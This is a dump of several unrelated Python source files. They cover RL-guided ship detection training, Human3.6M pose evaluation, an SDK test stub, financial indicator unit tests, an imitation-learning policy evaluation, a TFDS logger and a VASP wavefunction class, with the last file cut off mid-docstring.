with open(opt.fine_eval) as f:
fine_eval = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.coarse_tr) as f:
coarse_tr = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.coarse_eval) as f:
coarse_eval = yaml.load(f, Loader=yaml.FullLoader)
with open(opt.EfficientOD) as f:
efficient_config = yaml.load(f, Loader=yaml.FullLoader)
efficient_config['load'] = None # bug fix
epochs = opt.epochs
bs = opt.batch_size
# fine_detector = yolov5(fine_tr, fine_eval, epochs, bs)
# coarse_detector = yolov5(coarse_tr, coarse_eval, epochs, bs)
rl_agent = EfficientOD(efficient_config)
split_train_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/train/images'
split_val_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/val/images'
split_test_path = '/home/SSDD/ICIP21_dataset/800_HRSID/split_data_4_0/rl_ver/test/images'
split = 4
original_img_path = '/home/SSDD/ICIP21_dataset/800_HRSID/origin_data/rl_ver/'
original_img_path_train = original_img_path + 'train/images'
original_img_path_val = original_img_path + 'val/images'
original_img_path_test = original_img_path + 'test/images'
assert bs % split == 0, 'batch size should be divided with image split patch size'
num_classes = 2
fine_model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, num_classes=num_classes, pretrained_backbone=False)
coarse_model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=False, num_classes=num_classes, pretrained_backbone=False)
# # # # replace the classifier with a new one, that has
# # # # num_classes which is user-defined
# # # get number of input features for the classifier
fine_in_features = fine_model.roi_heads.box_predictor.cls_score.in_features
coarse_in_features = coarse_model.roi_heads.box_predictor.cls_score.in_features
# # # replace the pre-trained head with a new one
fine_model.roi_heads.box_predictor = FastRCNNPredictor(fine_in_features, num_classes)
coarse_model.roi_heads.box_predictor = FastRCNNPredictor(coarse_in_features, num_classes)
for fine_p, coarse_p in zip(fine_model.parameters(), coarse_model.parameters()):
fine_p.requires_grad = True
coarse_p.requires_grad = True
fine_model.to(device)
coarse_model.to(device)
# Optimizer
fine_params = [p for p in fine_model.parameters() if p.requires_grad]
coarse_params = [p for p in coarse_model.parameters() if p.requires_grad]
fine_optim = torch.optim.SGD(fine_params, lr=0.005, momentum=0.9, weight_decay=0.0005)
coarse_optim = torch.optim.SGD(coarse_params, lr=0.005, momentum=0.9, weight_decay=0.0005)
fine_lr_scheduler = torch.optim.lr_scheduler.StepLR(fine_optim, step_size=50)
coarse_lr_scheduler = torch.optim.lr_scheduler.StepLR(coarse_optim, step_size=50)
for e in range(epochs):
# label이 없더라도 loader에 image 생성
train_imgs = load_filenames(split_train_path, split, bs).files_array()
fine_train_dataset = load_dataset(train_imgs, fine_tr, bs)
coarse_train_dataset = load_dataset(train_imgs, fine_tr, bs)
fine_train_loader = load_dataloader(bs, fine_train_dataset)
coarse_train_loader = load_dataloader(bs, coarse_train_dataset)
fine_train_nb = len(fine_train_loader)
coarse_train_nb = len(coarse_train_loader)
assert fine_train_nb == coarse_train_nb, 'fine & coarse train batch number is not matched'
nb = fine_train_nb
# Logger
fine_metric_logger = utils.MetricLogger(delimiter=" ")
fine_metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
coarse_metric_logger = utils.MetricLogger(delimiter=" ")
coarse_metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
fine_header = 'Fine Epoch: [{}]'.format(e)
coarse_header = 'Coarse Epoch: [{}]'.format(e)
# # warmup
fine_lr_scheduler = None
corase_lr_scheduler = None
if e == 0:
warmup_factor = 1. / 1000
warmup_iters = min(1000, fine_train_nb-1)
fine_lr_scheduler = utils.warmup_lr_scheduler(fine_optim, warmup_iters, warmup_factor)
coarse_lr_scheduler = utils.warmup_lr_scheduler(coarse_optim, warmup_iters, warmup_factor)
for i, (fine_train, coarse_train) in enumerate(zip(fine_train_loader, coarse_train_loader)):
# train
fine_model.train()
coarse_model.train()
#### fine train ###
# Label mathching
fine_imgs, fine_labels = label_matching(fine_train, device)
fine_imgs = fine_imgs.to(device) / 255.
## train: img normalization --> not, zerodivision err
fine_loss_dict = fine_model(fine_imgs, copy.deepcopy(fine_labels))
fine_losses = sum(loss for loss in fine_loss_dict.values())
fine_loss_dict_reduced = reduce_dict(fine_loss_dict)
fine_loss_reduced = sum(loss for loss in fine_loss_dict_reduced.values())
fine_loss_val = fine_loss_reduced.item()
# optimizer
fine_optim.zero_grad()
fine_losses.backward()
fine_optim.step()
if fine_lr_scheduler is not None:
fine_lr_scheduler.step()
fine_metric_logger.update(loss=fine_loss_reduced, **fine_loss_dict_reduced)
fine_metric_logger.update(lr=fine_optim.param_groups[0]["lr"])
if i % opt.print_freq ==0:
space_fmt = ':' + str(len(str(fine_train_nb))) + 'd'
log_msg = fine_metric_logger.delimiter.join([fine_header, '[{0' + space_fmt + '}/{1}]', '{meters}'])
print(log_msg.format(i, fine_train_nb, meters=str(fine_metric_logger)))
### coarse train ###
# Label mathching
coarse_imgs, coarse_labels = label_matching(coarse_train, device)
coarse_imgs = coarse_imgs.to(device) / 255.
## train: img normalization --> not, zerodivision err
coarse_loss_dict = coarse_model(coarse_imgs, copy.deepcopy(coarse_labels))
coarse_losses = sum(loss for loss in coarse_loss_dict.values())
# utils
coarse_loss_dict_reduced = reduce_dict(coarse_loss_dict)
coarse_loss_reduced = sum(loss for loss in coarse_loss_dict_reduced.values())
coarse_loss_val = coarse_loss_reduced.item()
# optimizer
coarse_optim.zero_grad()
coarse_losses.backward()
coarse_optim.step()
if coarse_lr_scheduler is not None:
coarse_lr_scheduler.step()
coarse_metric_logger.update(loss=coarse_loss_reduced, **coarse_loss_dict_reduced)
coarse_metric_logger.update(lr=fine_optim.param_groups[0]["lr"])
if i % opt.print_freq ==0:
space_fmt = ':' + str(len(str(fine_train_nb))) + 'd'
log_msg = coarse_metric_logger.delimiter.join([coarse_header, '[{0' + space_fmt + '}/{1}]', '{meters}'])
print(log_msg.format(i, fine_train_nb, meters=str(coarse_metric_logger)))
## train eval
# result = (source_path, paths[si], mp, mr, map50, nl, stats)
# file_name, od_file_dir, mp=0(skip), ma=0(skip), map50(will be soon), objnum, stat
# stat = 4
# make_results(model, dataset, device)
fine_results = make_results(fine_model, fine_train, device)
coarse_results = make_results(coarse_model, coarse_train, device)
# conf_thresh=0.001 / iou_thres=0.6
rl_agent.train(e, i, nb, fine_results, coarse_results, original_data_path=original_img_path_train)
## Validation
if e % 1 == 0:
fine_dataset, coarse_dataset, policies = rl_agent.eval(split_val_path, original_img_path_val)
print(len(fine_dataset.tolist()))
print(len(coarse_dataset.tolist()))
fine_results, coarse_results = [], []
if len(fine_dataset.tolist()) > 0:
fine_val_dataset = load_dataset(fine_dataset, fine_tr, bs)
fine_val_loader = load_dataloader(bs, fine_val_dataset)
fine_nb = len(fine_val_loader)
for i, fine_val in tqdm.tqdm(enumerate(fine_val_loader), total=fine_nb):
fine_results += make_results(fine_model, fine_val, device)
if len(coarse_dataset.tolist()) > 0:
coarse_val_dataset = load_dataset(coarse_dataset, fine_tr, bs)
coarse_val_loader = load_dataloader(bs, coarse_val_dataset)
coarse_nb = len(coarse_train_loader)
for i, coarse_val in tqdm.tqdm(enumerate(coarse_val_loader), total=coarse_nb):
coarse_results += make_results(coarse_model, coarse_val, device)
map50 = compute_map(fine_results, coarse_results)
print('Validation MAP: \n', map50)
# save
if e % opt.save_freq == 0:
torch.save(fine_model, os.path.join(opt.save, 'fine_model'))
torch.save(coarse_model, os.path.join(opt.save, 'coarse_model'))
# Testing
fine_dataset, coarse_dataset, policies = rl_agent.eval(split_test_path, original_img_path_test)
fine_results, coarse_results = [], []
if len(fine_dataset.tolist()) > 0:
fine_test_dataset = load_dataset(fine_dataset, fine_tr, bs)
fine_test_loader = load_dataloader(bs, fine_test_dataset)
fine_nb = len(fine_test_loader)
for i, fine_test in tqdm.tqdm(enumerate(fine_test_loader), total=fine_nb):
fine_results += make_results(fine_model, fine_test, device)
if len(coarse_dataset.tolist()) > 0:
coarse_test_dataset = load_dataset(coarse_dataset, fine_tr, bs)
coarse_test_loader = load_dataloader(bs, coarse_test_dataset)
coarse_nb = len(coarse_test_loader)
for i, coarse_test in tqdm.tqdm(enumerate(coarse_test_loader), total=coarse_nb):
coarse_results += make_results(coarse_model, coarse_test, device)
map50 = compute_map(fine_results, coarse_results)
print('MAP: \n', map50)
with open('test_result.txt', 'a') as f:
f.write(str(map50))
with open('test_policies.txt', 'a') as f:
f.write(str(policies)) |
py | 1a4b8cdcb05e1efd89fcea6bb9dc63c642178f4b | # references:
# https://github.com/una-dinosauria/3d-pose-baseline/blob/master/src/predict_3dpose.py#L305
import numpy as np
from ..utils import data_utils, procrustes
class Human36M_JointErrorEvaluator:
def __init__(self, human36m, predict_14=False, apply_procrustes_alignment=False):
"""
Args:
human36m (Human36MDatasetHandler): Human3.6M dataset.
predict_14 (bool, optional): Whether to predict 14 3d-joints. Defaults to False.
apply_procrustes_alignment (bool, optional): Whether to apply procrustes alignment to the predicted poses.
"""
self.human36m = human36m
self.predict_14 = predict_14
self.apply_procrustes_alignment = apply_procrustes_alignment
self.n_joints = (
14 if self.predict_14 else 17
) # 17 = predicted 16 joints + root (Hip joint)
self.reset()
def reset(self):
"""Remove all samples added so far.
"""
self.joint_distances = []
self.actions = []
def add_samples(self, pred_3d_poses, truth_3d_poses, actions):
"""Add pairs of predicted and ground-truth poses to evaluate.
Args:
pred_3d_poses (numpy.array): Predicted 3d poses (normalized). `[batch_size, n_joints, 3]`.
truth_3d_poses (numpy.array): Ground-truth 3d poses (normalized). `[batch_size, n_joints, 3]`.
actions (list[str]): Actions to which the poses belong.
"""
# Compute distances of corresponding joints of pred/truth poses.
pred = self._preprocess_poses(pred_3d_poses) # [batch_size, n_joints x 3]
truth = self._preprocess_poses(truth_3d_poses) # [batch_size, n_joints x 3]
if self.apply_procrustes_alignment:
pred = self._apply_procrustes_alignment(
sources=pred, targets=truth
) # [batch_size, n_joints x 3]
d = self._compute_joint_distances(pred, truth) # [batch_size, n_joints]
self.joint_distances.append(d)
# Cache action of each frame for per action evaluation.
self.actions.extend(actions)
def get_metrics(self):
"""Get evaluation results.
Returns:
(dict): evaluation results.
"""
joint_distances = np.vstack(self.joint_distances) # [N, n_joints]
actions = np.array(self.actions) # [N,]
assert len(joint_distances) == len(actions)
# Evaluate joint position errors over all actions.
mpjpe = np.mean(joint_distances) # mean per joint position error: float
pjpe = np.mean(joint_distances, axis=0) # per joint position error: [n_joints,]
metrics = {
"MPJPE": mpjpe,
"PJPE": pjpe.tolist(),
}
# Evaluate joint position error per action.
for action in data_utils.H36M_ACTIONS:
mask = actions == action
if np.sum(mask) == 0: # In case no sample is found in the action,
mpjpe = pjpe = -1 # set errors as -1.
print("Warining: no test sample was found in the action: {action}. ")
else:
joint_distances_masked = joint_distances[mask]
mpjpe = np.mean(joint_distances_masked)
pjpe = np.mean(joint_distances_masked, axis=0)
metrics["MPJPE/{}".format(action)] = mpjpe
metrics["PJPE/{}".format(action)] = pjpe.tolist()
return metrics
def _preprocess_poses(self, poses_3d):
mean_3d = self.human36m.mean_3d
std_3d = self.human36m.std_3d
dim_to_ignore_3d = self.human36m.dim_to_ignore_3d
dim_to_use_3d = self.human36m.dim_to_use_3d
# Unnormalize 3d poses.
poses = data_utils.unnormalize_data(
poses_3d, mean_3d, std_3d, dim_to_ignore_3d
) # [batch_size, 32 x 3]
# Keep only the relevant joints.
dim_to_keep = (
dim_to_use_3d
if self.predict_14
else np.hstack([np.arange(3), dim_to_use_3d])
# Add root (Hip joint) if the model predicts 16 joints.
# XXX: Assuming the first 3 values represent root joint 3d position.
)
poses = poses[:, dim_to_keep] # [batch_size, n_joints x 3]
return poses
def _apply_procrustes_alignment(self, sources, targets):
sources_aligned = []
batch_size = len(sources)
for i in range(batch_size):
target = targets[i].reshape(-1, 3) # [n_joints, 3]
source = sources[i].reshape(-1, 3) # [n_joints, 3]
_, _, T, b, c = procrustes.compute_similarity_transform(
target, source, compute_optimal_scale=True
)
aligned = (b * source.dot(T)) + c
aligned = aligned.reshape((-1, self.n_joints * 3)) # [1, n_joints x 3]
sources_aligned.append(aligned)
return np.vstack(sources_aligned) # [batch_size, n_joints x 3]
def _compute_joint_distances(self, pred, truth):
# Compute Euclidean distance error per joint.
d_squared = (pred - truth) ** 2 # [batch_size, n_joints x 3]
d_squared = d_squared.reshape(
(-1, self.n_joints, 3)
) # [batch_size, n_joints, 3]
d_squared = np.sum(d_squared, axis=2) # [batch_size, n_joints]
d = np.sqrt(d_squared) # [batch_size, n_joints]
return d
|
py | 1a4b8f1fd786f0a168bcd44c163e14f3d9b7c346 | # coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 8
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_1
from isi_sdk_8_2_1.models.job_statistics_job_node_memory import JobStatisticsJobNodeMemory # noqa: E501
from isi_sdk_8_2_1.rest import ApiException
class TestJobStatisticsJobNodeMemory(unittest.TestCase):
"""JobStatisticsJobNodeMemory unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testJobStatisticsJobNodeMemory(self):
"""Test JobStatisticsJobNodeMemory"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_1.models.job_statistics_job_node_memory.JobStatisticsJobNodeMemory() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 1a4b8fc24463290d9d9afb562b4b0c37caf486fc | '''
Technical Indicator Node Unit Tests
To run unittests:
# Using standard library unittest
python -m unittest -v
python -m unittest tests/unit/test_indicator_node.py -v
or
python -m unittest discover <test_directory>
python -m unittest discover -s <directory> -p 'test_*.py'
# Using pytest
# "conda install pytest" or "pip install pytest"
pytest -v tests
pytest -v tests/unit/test_indicator_node.py
'''
import warnings
import unittest
import cudf
import gquant.cuindicator as gi
from gquant.plugin_nodes.transform.indicatorNode import IndicatorNode
from gquant.dataframe_flow.task import Task
from .utils import make_orderer
import numpy as np
import copy
ordered, compare = make_orderer()
unittest.defaultTestLoader.sortTestMethodsUsing = compare
class TestIndicatorNode(unittest.TestCase):
def setUp(self):
warnings.simplefilter('ignore', category=ImportWarning)
warnings.simplefilter('ignore', category=DeprecationWarning)
# ignore importlib warnings.
size = 200
half = size // 2
self.size = size
self.half = half
np.random.seed(10)
random_array = np.random.rand(size)
open_array = np.random.rand(size)
close_array = np.random.rand(size)
high_array = np.random.rand(size)
low_array = np.random.rand(size)
volume_array = np.random.rand(size)
indicator = np.zeros(size, dtype=np.int32)
indicator[0] = 1
indicator[half] = 1
df = cudf.DataFrame()
df['in'] = random_array
df['open'] = open_array
df['close'] = close_array
df['high'] = high_array
df['low'] = low_array
df['volume'] = volume_array
df['indicator'] = indicator
self._cudf_data = df
self.conf = {
"indicators": [
{"function": "port_chaikin_oscillator",
"columns": ["high", "low", "close", "volume"],
"args": [10, 20]},
{"function": "port_bollinger_bands",
"columns": ["close"],
"args": [10],
"outputs": ["b1", "b2"]}
],
"remove_na": True
}
def tearDown(self):
pass
@ordered
def test_colums(self):
'''Test node columns requirments'''
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": self.conf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
out_cols = inN.columns_setup()
col = "indicator"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "high"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "low"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "close"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "volume"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in inN.required['stock_in'], msg)
col = "CH_OS_10_20"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
col = "BO_BA_b1_10"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
col = "BO_BA_b2_10"
msg = "bad error: %s is missing" % (col)
self.assertTrue(col in out_cols['stock_out'], msg)
@ordered
def test_drop(self):
'''Test node columns drop'''
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": self.conf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({"stock_in": self._cudf_data})['stock_out']
msg = "bad error: df len %d is not right" % (len(o))
self.assertTrue(len(o) == 162, msg)
newConf = copy.deepcopy(self.conf)
newConf['remove_na'] = False
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": newConf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({"stock_in": self._cudf_data})['stock_out']
msg = "bad error: df len %d is not right" % (len(o))
self.assertTrue(len(o) == 200, msg)
@ordered
def test_signal(self):
'''Test signal computation'''
newConf = copy.deepcopy(self.conf)
newConf['remove_na'] = False
node_obj = {"id": "abc",
"type": "IndicatorNode",
"conf": newConf,
"inputs": {}}
task = Task(node_obj)
inN = IndicatorNode(task)
o = inN.process({'stock_in': self._cudf_data})['stock_out']
# check chaikin oscillator computation
r_cudf = gi.chaikin_oscillator(self._cudf_data[:self.half]['high'],
self._cudf_data[:self.half]['low'],
self._cudf_data[:self.half]['close'],
self._cudf_data[:self.half]['volume'],
10, 20)
computed = o[:self.half]['CH_OS_10_20'].to_array('pandas')
ref = r_cudf.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
r_cudf = gi.chaikin_oscillator(self._cudf_data[self.half:]['high'],
self._cudf_data[self.half:]['low'],
self._cudf_data[self.half:]['close'],
self._cudf_data[self.half:]['volume'],
10, 20)
computed = o[self.half:]['CH_OS_10_20'].to_array('pandas')
ref = r_cudf.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
# check bollinger bands computation
r_cudf = gi.bollinger_bands(self._cudf_data[:self.half]['close'], 10)
computed = o[:self.half]["BO_BA_b1_10"].to_array('pandas')
ref = r_cudf.b1.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
computed = o[:self.half]["BO_BA_b2_10"].to_array('pandas')
ref = r_cudf.b2.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
r_cudf = gi.bollinger_bands(self._cudf_data[self.half:]['close'], 10)
computed = o[self.half:]["BO_BA_b1_10"].to_array('pandas')
ref = r_cudf.b1.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
computed = o[self.half:]["BO_BA_b2_10"].to_array('pandas')
ref = r_cudf.b2.to_array('pandas')
err = np.abs(computed[~np.isnan(computed)] - ref[~np.isnan(ref)]).max()
msg = "bad error %f\n" % (err,)
self.assertTrue(np.isclose(err, 0, atol=1e-6), msg)
if __name__ == '__main__':
unittest.main()
|
py | 1a4b90103cf91f4b877146f81fec16fce295e637 | import numpy as np
import pickle
from sklearn.neighbors._kde import KernelDensity
import os
import sys
import joblib
import torch
import json
from tqdm import tqdm
sys.path.append("/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo")
from dataloader import DataLoader
from map_i80_ctrl import ControlledI80
from tianshou.env import SubprocVectorEnv
from rlkit.torch.sac.policies import MakeDeterministic
from rlkit.data_management.split_dict import split_dict
s_std = np.tile(np.array([392.1703, 44.0625, 24.4669, 1.0952]), 7)
s_mean = np.tile(np.array([887.6, 117.67, 36.453, -0.23616]), 7)
def kl_divergence(x1, x2):
p = kde_prob(x1, min_v=0, max_v=1, scale=100)
q = kde_prob(x2, min_v=0, max_v=1, scale=100)
return np.sum(np.where(p != 0, p * np.log(p / q), 0))
def kde_prob(x, min_v=0, max_v=1, scale=100):
kde = KernelDensity(kernel="gaussian", bandwidth=(max_v - min_v) * 1.0 / scale).fit(
list(x)
) # x.shape: [None, 2]
data = [
(i * 1.0 / scale, j * 1.0 / scale)
for i in range(min_v * scale, max_v * scale)
for j in range(min_v * scale, max_v * scale)
]
prob = np.exp(kde.score_samples(data)) + 1e-4 # x.shape: [None, 1]
return prob
def obs_unnorm(obs):
obs *= s_std
obs += s_mean
return obs
def make_env(env_kwargs, rank, seed=0, car_index=None):
def _init():
"""
env_specs:
env_name: 'halfcheetah'
env_kwargs: {} # kwargs to pass to the env constructor call
"""
env = ControlledI80(**env_kwargs)
env.seed(rank + seed)
if car_index is not None and hasattr(env, "set_train_indx"):
env.set_train_indx(car_index)
return env
return _init
class opt:
debug = 0
demo_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/expert_demo_xy.pkl"
test_idx_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo/demos/expert_trajs_50/PPUU/test_indx_final.pkl"
log_path = "/NAS2020/Workspaces/DRLGroup/zbzhu/lfo-ppuu/lfo/logs/gailfo-ppuu-final/gailfo_ppuu_final--2021_01_26_03_20_45--s-0"
model_path = os.path.join(log_path, "best.pkl")
variant_path = os.path.join(log_path, "variant.json")
with open(variant_path, "rb") as f:
variant = json.load(f)
env_kwargs = dict(
fps=30,
nb_states=1,
display=False,
delta_t=0.1,
store=False,
show_frame_count=False,
data_dir="ppuu_logs/",
)
if __name__ == "__main__":
env_num = 50
env_wait_num = 25
with open(test_idx_path, "rb") as f:
test_idx = pickle.load(f)
splited_eval_dict = split_dict(test_idx, env_num)
eval_car_num = [len(d) for d in splited_eval_dict]
envs = SubprocVectorEnv(
[
make_env(
env_kwargs,
i,
car_index=splited_eval_dict[i],
)
for i in range(env_num)
],
wait_num=env_wait_num,
)
if os.path.isfile(demo_path):
with open(demo_path, "rb") as f:
all_demo_x, all_demo_y = pickle.load(f)
else:
dataloader = DataLoader(None, opt, "i80")
all_demo_x, all_demo_y = [], []
for idx in test_idx.keys():
all_demo_x.extend(dataloader.states[idx][:, 0, 0].numpy())
all_demo_y.extend(dataloader.states[idx][:, 0, 1].numpy())
with open(demo_path, "wb") as f:
pickle.dump((all_demo_x, all_demo_y), f)
model = joblib.load(model_path)
policy = model["policy"]
eval_policy = MakeDeterministic(policy)
all_agent_x, all_agent_y = [], []
items = list(test_idx.items())
ready_env_ids = np.arange(env_num)
finished_env_ids = []
obs_list = envs.reset()
done = False
episode_step = np.zeros(env_num)
env_finished_car_num = np.zeros(env_num)
pbar = tqdm(total=len(items))
while True:
actions = []
for obs in obs_list[ready_env_ids]:
ori_obs = obs_unnorm(obs.copy())
agent_x = ori_obs[0]
agent_y = ori_obs[1]
all_agent_x.append(agent_x)
all_agent_y.append(agent_y)
with torch.no_grad():
action, _ = eval_policy.get_action(obs_np=obs)
actions.append(action)
actions = np.array(actions)
next_obs_list, rews, dones, env_infos = envs.step(actions, id=ready_env_ids)
ready_env_ids = np.array([i["env_id"] for i in env_infos])
obs_list[ready_env_ids] = next_obs_list
for idx, done in enumerate(dones):
env_id = ready_env_ids[idx]
episode_step[env_id] += 1
if done or episode_step[env_id] > 1500:
env_finished_car_num[env_id] += 1
pbar.update(1)
if not done:
obs_list[env_id] = envs.reset(id=env_id)
if env_finished_car_num[env_id] == eval_car_num[env_id]:
finished_env_ids.append(env_id)
ready_env_ids = np.array(
[x for x in ready_env_ids if x not in finished_env_ids]
)
if len(finished_env_ids) == env_num:
assert len(ready_env_ids) == 0
break
pbar.close()
all_agent_x = np.array(all_agent_x)[:, np.newaxis] / 1600
all_agent_y = np.array(all_agent_y)[:, np.newaxis] / 200
all_agent_pos = np.concatenate((all_agent_x, all_agent_y), 1)
all_demo_x = np.array(all_demo_x)[:, np.newaxis] / 1600
all_demo_y = np.array(all_demo_y)[:, np.newaxis] / 200
all_demo_pos = np.concatenate((all_demo_x, all_demo_y), 1)
kld = kl_divergence(all_agent_pos, all_demo_pos)
print(kld)
|
py | 1a4b90bcaa04099413775127fbdb065ea1e2bdcf | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A logger logging using absl.logging module."""
from typing import Dict, Optional
from absl import logging
from tensorflow_datasets.core.logging import base_logger
from tensorflow_datasets.core.utils import read_config as tfds_read_config
class LoggingLogger(base_logger.Logger):
def as_dataset(self, *, dataset_name: str, config_name: Optional[str],
version: str, data_path: str, split: str,
batch_size: Optional[int], shuffle_files: bool,
read_config: tfds_read_config.ReadConfig, as_supervised: bool,
decoders: Dict[str, str]):
logging.info("Constructing tf.data.Dataset %s for split %s, from %s",
dataset_name, split, data_path)
|
py | 1a4b9182180d2929d9f1a4962df283a4d3cea065 | from pawpyseed.core.wavefunction import *
class NCLWavefunction(pawpyc.CNCLWavefunction, Wavefunction):
def __init__(self, struct, pwf, cr, dim, symprec=1e-4, setup_projectors=False):
"""
Arguments:
struct (pymatgen.core.Structure): structure that the wavefunction describes
pwf (pawpyc.PWFPointer): holder class for pswf_t and k-points/k-point weights
cr (CoreRegion): Contains the pseudopotentials, with projectors and
partials waves, for the structure
dim (pymatgen.io.vasp.outputs.Outcar OR np.ndarry OR list of length 3):
Outcar object for reading ngf or the dimensions NG* of the FFT grid
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
self.band_props = pwf.band_props.copy(order="C")
super(Wavefunction, self).__init__(pwf)
if not self.ncl:
raise PAWpyError(
"Pseudowavefunction is collinear! Call Wavefunction(...) instead"
)
self.structure = struct
self.cr = cr
self.dim = np.array(dim).astype(np.int32)
if setup_projectors:
self.check_c_projectors()
@staticmethod
def from_files(
struct="CONTCAR",
wavecar="WAVECAR",
cr="POTCAR",
vr="vasprun.xml",
setup_projectors=False,
):
"""
Construct a Wavefunction object from file paths.
Arguments:
struct (str): VASP POSCAR or CONTCAR file path
wavecar (str): VASP WAVECAR file path
cr (str): VASP POTCAR file path
vr (str): VASP vasprun file path
outcar (str): VASP OUTCAR file path
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
vr = Vasprun(vr)
dim = np.array(
[vr.parameters["NGX"], vr.parameters["NGY"], vr.parameters["NGZ"]]
)
symprec = vr.parameters["SYMPREC"]
pwf = pawpyc.PWFPointer(wavecar, vr)
return NCLWavefunction(
Poscar.from_file(struct).structure,
pwf,
CoreRegion(Potcar.from_file(cr)),
dim,
symprec,
setup_projectors,
)
@staticmethod
def from_directory(path, setup_projectors=False):
"""
Assumes VASP output has the default filenames and is located
in the directory specificed by path.
Arguments:
path (str): VASP output directory
setup_projectors (bool, False): Whether to set up the core region
components of the wavefunctions. Pawpyseed will set up the projectors
automatically when they are first needed, so this generally
can be left as False.
Returns:
Wavefunction object
"""
filepaths = []
for d in ["CONTCAR", "WAVECAR", "POTCAR", "vasprun.xml"]:
filepaths.append(str(os.path.join(path, d)))
args = filepaths + [setup_projectors]
return NCLWavefunction.from_files(*args)
def desymmetrized_copy(self, allkpts=None, weights=None):
raise NotImplementedError()
def write_state_realspace(
self, b, k, s, fileprefix="", dim=None, scale=1, remove_phase=False
):
"""
Writes the real and imaginary parts of a given band to two files,
prefixed by fileprefix
Args:
b (int): band number (0-indexed!)
k (int): kpoint number (0-indexed!)
s (int): spin number (0-indexed!)
fileprefix (string, ""): first part of the file name
dim (numpy array of 3 ints, None): dimensions of the FFT grid
scale (scalar, 1): number to multiply the realspace wavefunction by.
For example, VASP multiplies charge density by the volume
of the structure.
remove_phase (False): If True, removes the e^(ikr) phase
from the wavefunction (this does not necessarily mean
the wavefunction is real). This is useful if you want
to visualize the wavefunction because the e^(ikr) phase
makes the wavefunction non-periodic
Returns:
A 3D array (indexed by x,y,z where x,y,z are fractional coordinates)
with complex double values for the realspace wavefunction
The wavefunction is written in two files with z the slow index.
"""
self.check_c_projectors()
if dim is not None:
self.update_dim(np.array(dim))
filename_base = "%sB%dK%dS%d" % (fileprefix, b, k, s)
filename1 = "%s_UP_REAL.vasp" % filename_base
filename2 = "%s_UP_IMAG.vasp" % filename_base
filename3 = "%s_DOWN_REAL.vasp" % filename_base
filename4 = "%s_DOWN_IMAG.vasp" % filename_base
res0, res1 = self._write_realspace_state(
filename1,
filename2,
filename3,
filename4,
scale,
b,
k,
s,
remove_phase=remove_phase,
)
self._convert_to_vasp_volumetric(filename1, self.dim)
self._convert_to_vasp_volumetric(filename2, self.dim)
self._convert_to_vasp_volumetric(filename3, self.dim)
self._convert_to_vasp_volumetric(filename4, self.dim)
return res0, res1
def write_density_realspace(self, filename="PYAECCAR.vasp", dim=None, scale=1):
"""
Writes the real and imaginary parts of a given band to two files,
prefixed by fileprefix
Args:
b (int): band number (0-indexed!)
